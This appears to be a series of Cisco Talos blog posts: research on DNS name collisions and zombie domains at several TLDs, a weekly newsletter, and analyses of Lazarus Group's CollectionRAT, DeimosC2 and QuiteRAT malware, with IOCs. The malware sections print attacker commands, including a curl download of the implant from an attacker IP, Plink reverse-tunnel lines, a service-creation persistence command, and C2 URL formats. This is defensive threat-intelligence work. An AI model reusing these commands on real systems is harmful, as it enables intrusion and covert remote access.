Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur. 
When clicking on a name that ends in “.zip” are people intending to open an archive

Tuesday, August 29, 2023 08:08

Google introduced the new “.zip” Top Level Domain (TLD) on May 3, 2023, igniting a firestorm of controversy as security organizations warned against the confusion that was certain to occur.

When clicking on a name that ends in “.zip” are people intending to open an archive file or an internet URL? The confusion that arises between the ZIP file extension and the ZIP TLD is called a “name collision” — and is not a new phenomenon.

According to ICANN, a name collision occurs “when a user unknowingly accesses a name that has been delegated in the public DNS when the user's intent is to access a resource identified by the same name in a private network.” Name collisions have been an issue dating back years. Back in 2013 when ICANN introduced several new TLDs they also introduced a Name Collision Occurrence Management Framework to deal with the problem.

Users and programs alike depend on DNS to navigate the internet. In the worst case, confusion over whether some name is a public DNS name or another private resource can cause sensitive data to fall into the hands of unintended recipients.

****Controlled interruption****

To alert network administrators to potential name collisions in DNS, the Name Collision Occurrence Management Framework prescribes a “controlled interruption.” In this approach, a TLD publishes special DNS records — instructions that provide information about a domain — at the root level. Some examples include mail exchange (MX), service location (SRV), text (TXT), and address (A) records. Networks whose internal names collide with the TLD receive DNS replies containing the name “your-dns-needs-immediate-attention.<TLD>” and IP address 127.0.53.53. Presumably, seeing this in the logs would allow administrators to address the problem.

****The .kids TLD is not alright****

One TLD that appears to publish controlled interruption DNS records is .kids. For example, querying DNS for the MX or SRV record for the .kids TLD yields the ‘your-dns-needs-immediate.attention.kids’ name in response. For some reason, however, contrary to the framework from ICANN, the .kids TLD publishes no A record at the root level. The .kids TLD formerly did have the 127.0.53.53 A record, per the controlled interruption policy from ICANN, but for whatever reason .kids stopped offering the A record IP address back in January of 2023. This suggests that after the controlled interruption policy was implemented it was either changed or never fully removed.

Hostname lookups on various DNS record types in the .kids TLD.

One critical piece of information that was left out of the ICANN name collision framework was that the TLD must ensure the name, ‘your-dns-needs-immediate-attention.<TLD>’ is not available for public registration. Unfortunately, no such restriction was in place at the .kids TLD, and Cisco Talos successfully registered the domain name:

    **your-dns-needs-immediate-attention.kids**

Talos set up an internet server to log all activity related to this name, and immediately we received a barrage of HTTP requests from systems running Microsoft’s “System Center Configuration Manager.”

SCCM requests are issued from various endpoints using a name in .kids.

System Center Configuration Manager is a tool used by administrators to remotely manage computer systems across a network. According to Microsoft:

“Configuration Manager helps you deliver more effective IT services by enabling:

*   Secure and scalable deployment of applications, software updates, and operating systems.
*   Real-time actions on managed devices.
*   Cloud-powered analytics and management for on-premises and internet-based devices.
*   Compliance settings management.
*   Comprehensive management of servers, desktops, and laptops.”

Because Talos registered the domain name "your-dns-needs-immediate-attention.kids", we were able to masquerade as a trusted system. Networks using .kids names could be tricked into trusting our system to relay internal mail, dictate configuration management settings, and more.

Systems attempting to relay email through Talos to various email addresses @kids.

Cisco Talos reached out to the administrators of the .kids TLD informing them of the problem. The TXT, MX and SRV DNS records at the .kids TLD DNS server were subsequently removed.

****Zombified DNS names****

Name collisions aren’t the only situations that can cause a TLD to act strangely. Some do not respond properly when presented with names that have expired or never existed. In these TLDs, unregistered and expired domain names still resolve to IP addresses. Some of these TLDs even publish MX records and collect emails for the names in question.

Typically, when a domain name is not actively registered, a DNS query for that name will generate the response,‘NXDOMAIN’ which tells the user that a particular name does not exist. NXDOMAIN DNS responses are useful for a number of reasons. Email list managers, for example, might use NXDOMAIN responses from DNS to help prune invalid recipients and recipients that cannot receive mail from their mailing lists.

****.ws ccTLD — Western Samoa****

The .ws country-level TLD (ccTLD) was created for Western Samoa and marketed as a global TLD that could stand for “website.” When a domain name at the .ws TLD expires (or if it is a new name that was never registered), DNS servers will never return an \`NXDOMAIN\` response. Rather, the .ws TLD continues to hand out an IP address and MX server:

The mail.hope-mail.com server accepts mail for any unregistered domain name at the .ws ccTLD.

****.vg ccTLD — The Virgin Islands****

The .vg country-level TLD belongs to the British Virgin Islands and, like the .ws ccTLD, when a name at .vg expires (or if it is a new name that was never registered), DNS servers will respond with an IP address. However, unlike the .ws TLD, .vg doesn’t provide an MX server for the domain name.

On the surface, this would seem like a good thing that no MX record is provided. However, according to RFC 5321, when a domain name associated with an email address has no MX records, “the address is treated as if it was associated with an implicit MX RR, with a preference of 0, pointing to that host.” In other words, SMTP servers will assume that mail should be delivered to the IP address associated with the A record for a domain.

In fact, the IP address handed out by the .vg TLD does listen on port 25 and accepts connections for non-existent domain names. Fortunately, attempts to deliver mail to a non-existent domain will fail with a 550 error message:

Unsuccessfully attempting to send mail to the implicit MX offered by .vg.

****.ph ccTLD — The Philippines****

The .ph ccTLD belongs to the Philippines, and instead of the expected NXDOMAIN response, DNS requests for expired or non-existent names at .ph will return the IP address 45\[.\]79\[.\]222\[.\]138.

Unlike the .vg ccTLD, there is no mail server listening on the IP address provided by the .ph TLD. Attempts to deliver mail to an expired .ph domain name will fail, but the domain name itself will still resolve, which can still be problematic in some situations.

****Second-level “TLDs”****

Besides the official list of TLDs sanctioned by ICANN, there are also quite a few second-level registrations that people have turned into their own “TLDs,” that also do not respond properly to zombified DNS names. For example, sites such as “com.de” are technically second-level registrations at the .de TLD, but they offer registrations at the third level, billing themselves as “Germany’s newest domain extension.”

Queries for expired/non-existent domains at com.de return both an IP address and a mail server.

Fortunately, the mail server mail.cash9.com will not accept mail for non-existent domain names.

Unsuccessfully attempting to send mail to the MX offered by .com.de.

A similar situation exists at the “TLD” us.org, which markets itself as “a new domain extension for organizations, projects, websites and people with a higher standard of social responsibility and ethical behavior.”

When a DNS query is issued to us.org for a name that has expired or does not exist, an IP address is returned along with several MX servers:

MX records for the .us.org domain.

The DNS records at us.org are set up in an interesting way. Although they return MX records for our non-existent domain name, if you look carefully at the MX records returned by the DNS we can see that the lowest preference MX is simply a dot \[.\]. This is a NULL MX setting and it means that there are no mail servers for the domain. Well-behaved mail servers will recognize the NULL MX preference and cease attempting to deliver mail to that address. Poorly behaved mail servers, on the other hand, may latch onto a lower preference MX and connect to googlemail.com to attempt email delivery.

What's in a name?  Strange behaviors at top-level domains creates uncertainty in DNS

The latest activity from Lazarus Groups, .gov domains scamming people out of "V-Bucks" and more in this week's edition.

Thursday, August 24, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I have no idea how “Fortnite” keeps coming up in this newsletter, but here we are again.

Even though the game/metaverse has never been bigger, it had been a while since I had heard about “V-Bucks” scams. V-Bucks are the in-game virtual currency “Fortnite” uses to sell character skins and other visual elements.

After the game’s initial surge in popularity, scams claiming to get players easy V-Bucks were all over the place in the form of fake advertisements, phishing emails, scams and YouTube videos. And as the game has only become more ubiquitous, so have scams and cyber attacks centered around the game.

Wired reported last week that a central network of bad actors is responsible for compromising legitimate domains (some of them with the .gov and .edu top-level domains) and using them to trick players into sharing personal information or downloading malicious apps. This widespread campaign targets players of “Fortnite” and “Roblox,” another half-game, half-metaverse.

These compromised sites promised to send rewards in these games to players in exchange for clicking on a link, downloading a file or filling out a form.

This led me down another rabbit hole of potential Fortnite scams that I hadn’t thought about, which are the thousands of knockoffs that exist.

For some reason, just searching “Fortnite” on the Google Play store doesn’t return any results, but when you search “Fortnite game,” users are served with tons of apps of questionable origin and legitimacy. The real “Fortnite” can only be downloaded from the Epic Games Store, owned by the game’s publisher and the subject of a long legal saga with Apple.

The second-most-popular result for “Fortnite game” is something called “Battle Royale Chapter 4 Season3” published on the store by the auspiciously named “EPic Games,” which wreaks of the same vibes as a typosquatted domain.

Some of the top reviews for the app also seem to be written by bots, and in one case, the most recent 5-star review came from a user who appeared to credit ChatGPT with writing the text.

I’m not blaming anyone or any company for the existence of these types of scams, I just think it’s worth noting to parents and potential players that bad actors are still trying to backpack off the popularity of these games. It likely doesn’t fall on the companies making these games to regulate this space and make sure scammers aren’t capitalizing off their popularity — after all, no one blames the bank if an attacker uses their name in a phishing email to steal login credentials.

But I also don’t know who it falls to, either. As users, it again falls on us to just be hyper-vigilant and prepared, knowing attackers will try to leverage anything, even fake money used to buy virtual hot dog suits, to scam people.

**The one big thing**

The infamous Lazarus Group APT is back at it again with two new remote access trojans. The North Korean state-sponsored group is well known for using a variety of malware to generate revenue for the hermit government and trying to spy on their various adversaries. Now, they have two new RATs that Talos recently discovered, largely based on open-source tools or previously leaked malware code. Lazarus Group is increasingly using the Qt framework to create their malware, which poses new challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult.

**Why do I care?**

Any time the Lazarus Group is active, everyone should take notice. This is one of the most high-profile APTs on the threat landscape right now, and they’ve shown that they will not hesitate to exhaust all options to try to generate money for North Korea’s government. With this specific set of RATs, they are smaller than Lazarus’ usual payloads, which makes their operations slimmer, faster and harder to detect. Once infected, Lazarus Group can carry out a wide range of malicious actions on targets, ranging from deploying ransomware to completely lock down targeted machines, stealing personal information, or hijacking hardware for cryptocurrency mining.

**So now what?**

Both the blogs we published Thursday morning include guidance on remediating these threats. The use of open-source tooling can sometimes make it easier for security researchers to spot Lazarus Group activity, and in the case of the two new RATs, Talos has a wide range of Snort and ClamAV detection available.

**Top security headlines of the week**

**The FBI warned that North Korean state-sponsored actors are preparing to cash out up to $40 million worth of cryptocurrency after multiple heists.** The Lazarus Group reportedly is holding onto six separate crypto wallets holding a combined 1,580 Bitcoin over the course of 24 hours earlier this week. This APT is known for carrying out data breaches and cyber attacks to generate funding for the country’s illegal nuclear weapons program. The Lazarus Group previously stole $60 million and $37 million in cryptocurrency from Alphapo and CoinsPaid, respectively, in July, and $100 million from Atomic Wallet in June. In its alert, the FBI shared the Bitcoin addresses associated with the attacks so cryptocurrency agencies could examine their blockchain data and “be vigilant in guarding against transactions directly with, or derived from the addresses.” (TechCrunch, SecurityWeek)

**A previously unknown hacking group appears to be behind a supply chain attack targeting roughly 100 computers located in Hong Kong and other areas of Asia.** Security researchers attributed the attack to a new actor known as “Carderbee” that is currently not tied to any state affiliations. The attackers exploited the legitimate Cobra DocGuard software — made by a Chinese software company — to deliver a malicious software update that compromised the machines. Because only about 2,000 machines worldwide use DocGuard, researchers believe it is a highly targeted attack looking to compromise specific victims. Each attack tried to deploy the Korplug (the predecessor of PlugX) backdoor onto victim computers. (CyberScoop, The Record by Recorded Future)

**The Clop threat actor was responsible for more than a third of all ransomware attacks in July,** according to multiple industry reports. Clop continues to carry out follow-on attacks associated with its massive breach of the MOVEit file transfer software. More than 4 million Colorado residents may have been affected because of the MOVEit breach, with the state’s Department of Health Care Policy & Financing (HCPF) disclosing this week that it was affected through a technology partner, IBM. HCPF stated that the MOVEit data breach leaked sensitive data but did not compromise the state agency’s internal systems. As of this week, some estimates state that more than 730 organizations have been affected by the MOVEit breach. (Cybersecurity Dive, CPO Magazine)

**Can’t get enough Talos?**

*   Talos Takes Ep. #151: Hacktivism is quietly growing, especially when it comes to Russia's invasion of Ukraine
*   Three vulnerabilities in NVIDIA graphics driver could cause memory corruption
*   Generating FLIRT signatures for Nim and other non-C programming languages
*   Cisco: Bringing More Intelligence to Bear on the Threat Landscape

**Upcoming events where you can find Talos**

**LABScon** **(Sept. 20 - 23)**

Scottsdale, Arizona

> Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with a one-click zero-day exploit.

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 24283c2eda68c559f85db7bf7ccfe3f81e2c7dfc98a304b2056f1a7c053594fe  
**MD5:** 49ae44d48c8ff0ee1b23a310cb2ecf5a  
**Typical Filename:** nYzVlQyRnQmDcXk  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Scar::tpd

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440  
**MD5:** ef6ff172bf3e480f1d633a6c53f7a35e  
**Typical Filename:** iizbpyilb.bat  
**Claimed Product:** N/A  
**Detection Name:** Trojan.Agent.DDOH

**SHA 256:** 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf  
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551  
**Typical Filename:** rcx4d83.tmp  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Pykspa::tpd

Years into these games’ histories, attackers are still creating “Fortnite” and “Roblox”-related scams

Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.

Thursday, August 24, 2023 08:08

*   In the Lazarus Group’s latest campaign, which we detailed in a recent blog, the North Korean state-sponsored actor is exploiting CVE-2022-47966, a ManageEngine ServiceDesk vulnerability to deploy multiple threats. In addition to their “QuiteRAT” malware, which we covered in the blog, we also discovered Lazarus Group using a new threat called “CollectionRAT.”  
    
*   CollectionRAT has standard remote access trojan (RAT) capabilities, including the ability to run arbitrary commands on an infected system. Based on our analysis, CollectionRAT appears to be connected to Jupiter/EarlyRAT, another malware family Kaspersky recently wrote about and attributed to Andariel, a subgroup within the Lazarus Group umbrella of threat actors.  
    
*   Lazarus Group appears to be changing its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks, as opposed to strictly employing them in the post-compromise phase.  
    
*   One such example of this trend is Lazarus Group’s use of the open-source DeimosC2 framework. The DeimosC2 agent we discovered in this campaign is an ELF binary, indicating Lazarus’ intention to deploy this implant during initial access against compromised Linux endpoints.

**Lazarus Group reuses infrastructure in continuous assault on enterprises**

In the new Lazarus Group campaign we recently disclosed, the North Korean state-sponsored actor continues to use much of the same infrastructure despite those components being well-documented by security researchers over the years. Their continued use of the same tactics, techniques and procedures (TTPs) — many of which are publicly known — highlights the group’s confidence in their operations and presents opportunities for security researchers. By tracking and analyzing these reused infrastructure components, we identified the new CollectionRAT malware detailed in this report.

As mentioned, Lazarus Group remains highly active, with this being their third documented campaign in less than a year. In September 2022, Talos published details of a Lazarus Group campaign targeting energy providers in the United States, Canada and Japan. This campaign, enabled by the successful exploitation of the Log4j vulnerability, heavily employed a previously unknown implant we called “MagicRAT,” along with known malware families VSingle, YamaBot and TigerRAT, all of which were previously attributed to the threat actor by Japanese and Korean government agencies.

Some of the TTPs used in another Lazarus Group campaign in late 2022 have been highlighted by WithSecure. This report illustrated Lazarus Group exploiting unpatched Zimbra devices and deploying a remote access trojan (RAT) similar to MagicRAT. This is the same RAT Talos observed being deployed after Lazarus Group’s exploitation of ManageEngine ServiceDesk, which we detailed in an earlier blog, -known as “QuiteRAT.” QuiteRAT and MagicRAT are both based on the Qt framework and have similar capabilities, but QuiteRAT is likely an attempt to compact MagicRAT into a smaller and easier to deploy malicious implant based on its size.

  
In addition to this recent campaign illustrating how active Lazarus Group remains, this activity also serves as another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.

Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity.

The connections between the various malware are depicted below:

**Lazarus evolves malicious arsenal with CollectionRAT and DeimosC2**

CollectionRAT consists of a variety of standard RAT capabilities, including the ability to run arbitrary commands and manage files on the infected endpoint. The implant consists of a packed Microsoft Foundation Class (MFC) library-based Windows binary that decrypts and executes the actual malware code on the fly. Malware developers like using MFC even though it’s a complex, object-oriented wrapper. MFC, which traditionally is used to create Windows applications’ user interfaces, controls and events, allows multiple components of malware to seamlessly work with each other while abstracting the inner implementations of the Windows OS from the authors. Using such a complex framework in malware makes human analysis more cumbersome. However, in CollectionRAT, the MFC framework has just been used as a wrapper/decrypter for the actual malicious code.

CollectionRAT initially gathers system information to fingerprint the infection and relay it to the C2 server. It then receives commands from the C2 server to perform a variety of tasks on the infected system. The implant has the ability to create a reverse shell, allowing it to run arbitrary commands on the system. The implant can read and write files from the disk and spawn new processes, allowing it to download and deploy additional payloads. The implant can also remove itself from the endpoint when directed by the C2.

Implant's configuration strings.

The preliminary system information is sent to the C2 server to register the infection, which subsequently issues commands to the implant.

Initial check-in over HTTP to C2 server.

**CollectionRAT and its link to EarlyRAT**

Analyzing CollectionRAT indicators of compromise (IOCs) enabled us to discover links to EarlyRAT, a PureBasic-based implant that security research firm Kaspersky recently attributed to the Andariel subgroup. We discovered a CollectionRAT sample signed with the same certificate used to sign an older version of EarlyRAT from 2021. Both sets of samples used the same certificate from “OSPREY VIDEO INC.” with the same serial number and thumbprint. The EarlyRAT malware was also listed in CISA’s advisory from February 2023 highlighting ransomware activity conducted by North Korea against healthcare and critical infrastructure entities across the world. Kaspersky reported that EarlyRAT is deployed via the successful exploitation of the Log4j vulnerability. EarlyRAT is also known as the “Jupiter” malware. DCSO CyTec’s blog contains more details about Jupiter.

Common OSPREY VIDEO INC certificate from 2021 used to sign CollectionRAT and EarlyRAT

Lazarus Group appears to be shifting its tactics, increasingly relying on open-source tools and frameworks in the initial access phase of their attacks as opposed to strictly employing them in the post-compromise phase. Lazarus Group previously relied on the use of custom-built implants such as MagicRAT, VSingle, DTrack, and Yamabot as a means of establishing persistent initial access on a successfully compromised system. These implants are then instrumented to deploy a variety of open-source or dual-use tools to perform a multitude of malicious hands-on-keyboard activities in the compromised enterprise network. These include proxy tools,, credential-dumping tools such as Mimikatz and post-compromise reconnaissance and pivoting frameworks such as Impacket. However, these tools have primarily been used in the post-compromise phase of the attack. This campaign is one such instance where the attackers used the DeimosC2 open-source C2 framework as a means of initial and persistent access. DeimosC2 is a GoLang-based C2 framework supporting a variety of RAT capabilities similar to other popular C2 frameworks such as Cobalt Strike and Sliver.

**DeimosC2 analysis**

Apart from the many dual-use tools and post-exploitation frameworks found on Lazarus Group’s hosting infrastructure, we discovered the presence of a new implant that we identified as a beacon from the open-source DeimosC2 framework. Contrary to most of the malware found on their hosting infrastructure, the DeimosC2 implant was a Linux ELF binary, indicating the intention of the group to deploy it during the initial access on Linux-based servers.

The implant itself is an unmodified copy of the regular beacon that the DeimosC2’s C2 server produces when configured with the required parameters. It contains the standard URI paths that remain the same as the configuration provided in an out-of-the-box configuration of the implant. The lack of heavy customization of the implant indicates that the operators of DeimosC2 in this campaign may still be in the process of getting used to and adopting the framework to their needs.

Configuration in the DeimosC2 implant.

Trend Micro has an excelelnt analysis of the DeimosC2, but the implants typically have various RAT capabilities such as:

*   Execute arbitrary commands on the endpoint.
*   Credential stealing and registry dumping.
*   Download and upload files from C2.
*   Shellcode execution.
*   Uninstallation of the implant.

**Malicious Plink**

Another open-source tool we observed Lazarus Group using is the reverse tunneling tool PuTTY Link (Plink). In the past, we’ve observed Lazarus Group use Plink to establish remote tunnel using commands such as:

pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

The option -R forwards port 8118 on 127.0.0.1 to the remote server on port 18118.

However, we found that Lazarus Group has now started generating malicious Plink binaries out of PuTTY’s source code to embed the reverse tunnel command strings in the binary itself. The following figure shows a comparison of:

*   The malicious Plink binary on the left contains the reverse tunnel command with the switches in the format:

Plink.exe -N -R 4443:127.0.0.1:80 -P 443 -l [username]-pw [password] <Remote_IP>

*   A benign Plink binary on the right was used in 2022 by Lazarus as part of their hands-on-keyboard activity.

A malicious copy of Plink (left) compared to a benign version (right), both used by Lazarus.

The malicious Plink will also create a mutex named “Global\\WindowsSvchost” before establishing the remote tunnel to ensure that only one connection is made between the local machine and C2.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. Snort SIDs for this threat: **62248, 62253-62255.**

**IOCs**

IOCs for this research can also be found in our GitHub repository here.

**Hashes  
****QuiteRAT**

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6  

**CollectionRAT**

db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984

773760fd71d52457ba53a314f15dddb1a74e8b2f5a90e5e150dea48a21aa76df  

**DeimosC2**

05e9fe8e9e693cb073ba82096c291145c953ca3a3f8b3974f9c66d15c1a3a11d  

**Trojanized Plink**

e3027062e602c5d1812c039739e2f93fc78341a67b77692567a4690935123abe

**Networks IOCs  
**

146\[.\]4\[.\]21\[.\]94

109\[.\]248\[.\]150\[.\]13

108\[.\]61\[.\]186\[.\]55:443

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/comp\[.\]dat

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/log\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/logs\[.\]php

hxxp\[://\]ec2-15-207-207-64\[.\]ap-south-1\[.\]compute\[.\]amazonaws\[.\]com/resource/main/rawmail\[.\]php

hxxp\[://\]109\[.\]248\[.\]150\[.\]13/EsaFin\[.\]exe

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/boards/boardindex\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/editor/common/cmod

Lazarus Group's infrastructure reuse leads to discovery of new malware

This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.

Thursday, August 24, 2023 08:08

*   Cisco Talos discovered the North Korean state-sponsored actor Lazarus Group targeting internet backbone infrastructure and healthcare entities in Europe and the United States. This is the third documented campaign attributed to this actor in less than a year, with the actor reusing the same infrastructure throughout these operations.  
    
*   In this campaign, the attackers began exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) five days after PoCs for the exploit were publicly disclosed to deliver and deploy a newer malware threat we track as “QuiteRAT.” Security researchers first discovered this implant in February, but little has been written on it since then.  
    
*   QuiteRAT has many of the same capabilities as Lazarus Group’s better-known MagicRAT malware, but its file size is significantly smaller. Both implants are built on the Qt framework and include capabilities such as arbitrary command execution.  
    
*   Lazarus Group’s increasing use of the Qt framework creates challenges for defenders. It increases the complexity of the malware’s code, making human analysis more difficult compared to threats created using simpler programming languages such as C/C++, DOT NET, etc. Furthermore, since Qt is rarely used in malware development, machine learning and heuristic analysis detection against these types of threats are less reliable.

**Lazarus Group compromises internet backbone infrastructure company in Europe  
**

In early 2023, we observed Lazarus Group successfully compromise an internet backbone infrastructure provider in Europe to successfully deploy QuiteRAT. The actors exploited a vulnerable ManageEngine ServiceDesk instance to gain initial access. The successful exploitation triggered the immediate download and execution of a malicious binary via the Java runtime process. We observed Lazarus Group use the cURL command to immediately deploy the QuiteRAT binary from a malicious URL:

curl hxxp[://]146[.]4[.]21[.]94/tmp/tmp/comp[.]dat -o c:\users\public\notify[.]exe

The IP address 146\[.\]4\[.\]21\[.\]94 has been used by Lazarus since at least May 2022.

A successful download of the binary leads to the execution of the QuiteRAT binary by the Java process, resulting in the activation of the implant on the infected server. Once the implant starts running, it sends out preliminary system information to its command and control (C2) servers and then waits on the C2 to respond with either a command code to execute or an actual Windows command to execute on the endpoint via a child cmd.exe process. Some of the initial commands executed by QuiteRAT on the endpoint are for reconnaissance:

Command

Intent

C:\\windows\\system32\\cmd.exe /c systeminfo | findstr Logon

Get logon server name (machine name). System Information Discovery \[T1082\]

C:\\windows\\system32\\cmd.exe /c ipconfig | findstr Suffix

Domain name for the system. Domain discovery \[T1087/002\]

There is no in-built persistence mechanism in QuiteRAT. Persistence for the implant is achieved via the registry by issuing the following command to QuiteRAT:

C:\Windows\system32\cmd[.]exe /c sc create WindowsNotification type= own type= interact start= auto error= ignore binpath= cmd /K start c:\users\public\notify[.]exe

A typical infection chain looks like this:

**Lazarus Group evolves malicious arsenal with QuiteRAT**

QuiteRAT is a fairly simple remote access trojan (RAT). It consists of a compact set of statically linked Qt libraries along with some user-written code. The Qt framework is a platform for developing cross-platform applications. However, it is immensely popular for developing Graphical User Interface in applications. Although QuiteRAT, just like MagicRAT, uses embedded Qt libraries, none of these implants have a Graphical User Interface. .As seen with Lazarus Group’s MagicRAT malware, the use of Qt increases the code complexity, making human analysis harder. Using Qt also makes machine learning and heuristic analysis detection less reliable, since Qt is rarely used in malware development.

Based on QuiteRAT’s technical characteristics, including the usage of the Qt framework, we assess that this implant belongs to the previously disclosed MagicRAT family. QuiteRAT was briefly discussed in WithSecure’s report from early 2023. The new campaign we’re disclosing exploited a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) — which has a Kenna risk score of 100 out of 100 — to deploy QuiteRAT.

The implant initially gathers some rudimentary information about the infected endpoint, including MAC addresses, IP addresses, and the current user name of the device. This information is then arranged in the format:

<MAC_address><IP_address>[0];<MAC_address><IP_address>[1];...<MAC_address><IP_address>[n];<username>

The resulting string is then used to calculate an MD4 hash, which is then used as the infection identifier (victim identifier) while conversing with the C2 server.

All the networking-related configurations, such as the C2 URLs and extended URI parameters, are encoded and stored in the malware. The strings are XOR’ed with 0x78 and then base64 encoded. This technique is in line with WithSecure’s analysis from earlier this year.

Configuration strings encoded in the malware.

The URL to communicate with the C2 is constructed as follows with the following extended URI parameters:

Parameter names

Values

Description

mailid

<12 chars from MD4>

The first 12 characters from the MD4 of the information gathered from the endpoint (described earlier)

action

“inbox” = send check beacon  
“sent” = data is being sent to C2

Signifies the action being taken

body

<base64\_xorred\_data>

Data to be sent to C2.

param

<Internal/Local IP address>

The internal/LAN IP address of the infected endpoint.

session

<rand>

Pseudo-random number generated by the implant.

The URL for the HTTP GET to obtain inputs from the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&**action=inbox**&param=<Internal/Local_IP_address>&session=<rand>

Data is also sent to the C2 using the HTTP GET VERB as well. The URL for the HTTP GET to send data to the C2 looks like this:

<C2_URL>/mailid=<12chars_MD4>&**action=sent&body=<base64_xorred_data>**param=<Internal/Local_IP_address>&session=<rand>

Any data sent to the C2 is utmost 0x400 (1,024) bytes in length. If the output of a command executed on the endpoint by the implant is larger than 1,024 bytes, the implant appends the < No Pineapple! > marker at the end of the data.

The User-Agent used during communications by the implant is

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

The malware also has the ability to run a ping command on a random IP address that it generates on the fly. The request is usually executed using the command <compspec_path>\cmd.exe /c <IP_Address> -n 18 &:  

Ping command being constructed by the implant including the octets for a random IP.

The implant can also receive a command code “sendmail” along with a numeric value from the C2 server. This value is then used by the implant to Sleep for a specific period of time (in minutes) before it begins talking to the C2 server again. The adversaries likely use this functionality to keep the implant dormant for longer periods of time while ensuring continued access to the compromised enterprise network.

The implant also has the ability to receive a second URL from the current C2 server via the command code receivemail. The implant will then reach out to the second URL to receive commands and payloads from the server to execute on the infected system.

We have seen the following versions of QuiteRAT in the wild. We are only able to share one of the file hashes at this time, which is included in the IOCs section:

QuiteRAT binary name

Compile date

notify.exe (32bit)

May 30, 2022

acres.exe

July 22, 2022

acres.exe (64bit)

July 25, 2022

The latest version of Lazarus Group’s older MagicRAT implant observed in the wild was compiled in April 2022. This is the last version of MagicRAT that we know of. The use of MagicRAT’s derivative implant, QuiteRAT, beginning in May 2023 suggests the actor is changing tactics, opting for a smaller, more compact Qt-based implant.

**QuiteRAT vs MagicRAT**

